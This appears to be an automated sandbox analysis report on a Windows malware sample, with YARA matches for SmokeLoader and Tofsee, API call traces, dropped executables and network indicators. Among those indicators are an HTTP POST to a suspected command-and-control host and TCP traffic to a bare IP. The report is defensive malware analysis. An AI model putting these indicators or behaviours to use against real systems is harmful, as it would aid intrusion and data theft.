                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                        Source: svchost.exe, 00000011.00000003.394528144.0000023EEF98D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
                        Source: svchost.exe, 00000011.00000003.394528144.0000023EEF98D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
                        Source: svchost.exe, 00000011.00000003.394643628.0000023EEF99E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.394528144.0000023EEF98D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-12-15T12:35:18.6138891Z||.||e217b6c4-7952-49aa-94f4-7f08eae9e9cb||1152921505694292641||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                        Source: svchost.exe, 00000011.00000003.394643628.0000023EEF99E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.394528144.0000023EEF98D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-12-15T12:35:18.6138891Z||.||e217b6c4-7952-49aa-94f4-7f08eae9e9cb||1152921505694292641||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edrbthhhm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: host-data-coin-11.com
                        Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49819 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49850 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49854 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 52.216.132.51:443 -> 192.168.2.3:49855 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49861 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 52.217.141.225:443 -> 192.168.2.3:49862 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49865 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49868 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 155.248.231.246:443 -> 192.168.2.3:49874 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49877 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing:

                        barindex
                        Yara detected SmokeLoaderShow sources
                        Source: Yara matchFile source: 00000006.00000002.347406740.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.406588143.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.347689698.0000000002051000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.406852686.0000000002051000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000000.337265562.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                        Source: A3D.exe, 0000001B.00000002.473085263.0000000000EA0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                        Spam, unwanted Advertisements and Ransom Demands:

                        barindex
                        Yara detected TofseeShow sources
                        Source: Yara matchFile source: 26.2.F3F5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.F3F5.exe.bc0e50.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.F3F5.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.F3F5.exe.be0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001A.00000002.484836901.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000003.442910237.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.486122776.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: F3F5.exe PID: 3132, type: MEMORYSTR

                        System Summary:

                        barindex
                        PE file has nameless sectionsShow sources
                        Source: B24B.exe.10.drStatic PE information: section name:
                        Source: B24B.exe.10.drStatic PE information: section name:
                        Source: B24B.exe.10.drStatic PE information: section name:
                        Source: B24B.exe.10.drStatic PE information: section name:
                        Source: B24B.exe.10.drStatic PE information: section name:
                        Source: B24B.exe.10.drStatic PE information: section name:
                        Source: B24B.exe.10.drStatic PE information: section name:
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_2_00402A5F
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_2_00402AB3
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_1_00402A5F
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_1_00402AB3
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_2_00402A5F
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_2_00402AB3
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_1_00402A5F
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_1_00402B2E
                        Source: C:\Users\user\AppData\Roaming\jutawrsCode function: 20_2_00402A5F
                        Source: C:\Users\user\AppData\Roaming\jutawrsCode function: 20_2_00402AB3
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00410800
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00411280
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_004103F0
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_004109F0
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_0040C913
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_02A7DAD8
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_02A78A88
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_02A78A98
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_02A782F8
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_050D1410
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_050D4FF8
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_050D0040
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_050D2A48
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00401280 GlobalAlloc,ShellExecuteExW,RtlAllocateHeap,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                        Source: 4BfFNMA5mb.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 4BfFNMA5mb.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 6BE6.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 6BE6.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 7D3D.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 9904.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 9904.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: A847.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 2AA1.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 2AA1.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: E936.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: E936.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: F3F5.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: F3F5.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: F3F5.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: jutawrs.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: jutawrs.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: almerphs.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: almerphs.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: almerphs.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeSection loaded: mscorjit.dll
                        Source: sqlite3[1].dll.25.drStatic PE information: Number of sections : 19 > 10
                        Source: sqlite3.dll.25.drStatic PE information: Number of sections : 19 > 10
                        Source: 4BfFNMA5mb.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\lxijggxd\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: String function: 004048D0 appears 460 times
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: String function: 00426C30 appears 133 times
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: String function: 00428610 appears 93 times
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: String function: 004281E0 appears 93 times
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: String function: 00426800 appears 133 times
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: String function: 00BC2794 appears 35 times
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: String function: 0040EE2A appears 40 times
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: String function: 00402544 appears 53 times
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_2_00401962 Sleep,NtTerminateProcess,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_2_0040196D Sleep,NtTerminateProcess,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_2_00401A0B NtTerminateProcess,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_2_00402084 LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_2_00402491 NtOpenKey,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_1_00402084 LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 6_1_00402491 NtOpenKey,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_2_00401962 Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_2_0040196D Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_2_00401A0B NtTerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_2_00402084 LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_2_00402491 NtOpenKey,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_1_00402084 LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_1_00402491 NtOpenKey,
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00401820 GetCurrentProcess,NtQueryInformationToken,
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_0510F7A0 NtAllocateVirtualMemory,
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_0510F6C0 NtUnmapViewOfSection,
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                        Source: F3F5.exe.10.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: almerphs.exe.26.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: 6BE6.exe.10.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: 9904.exe.10.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: B24B.exe.10.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                        Source: 7D3D.exe.10.drStatic PE information: Section: DATA ZLIB complexity 0.999436515824
                        Source: B24B.exe.10.drStatic PE information: Section: ZLIB complexity 1.00052083333
                        Source: B24B.exe.10.drStatic PE information: Section: ZLIB complexity 1.0107421875
                        Source: B24B.exe.10.drStatic PE information: Section: ZLIB complexity 1.00306919643
                        Source: B24B.exe.10.drStatic PE information: Section: .rsrc ZLIB complexity 0.999701433121
                        Source: 4BfFNMA5mb.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@45/30@83/15
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                        Source: 4BfFNMA5mb.exeVirustotal: Detection: 36%
                        Source: 4BfFNMA5mb.exeReversingLabs: Detection: 53%
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        Source: unknownProcess created: C:\Users\user\Desktop\4BfFNMA5mb.exe "C:\Users\user\Desktop\4BfFNMA5mb.exe"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeProcess created: C:\Users\user\Desktop\4BfFNMA5mb.exe "C:\Users\user\Desktop\4BfFNMA5mb.exe"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\jutawrs C:\Users\user\AppData\Roaming\jutawrs
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2AA1.exe C:\Users\user\AppData\Local\Temp\2AA1.exe
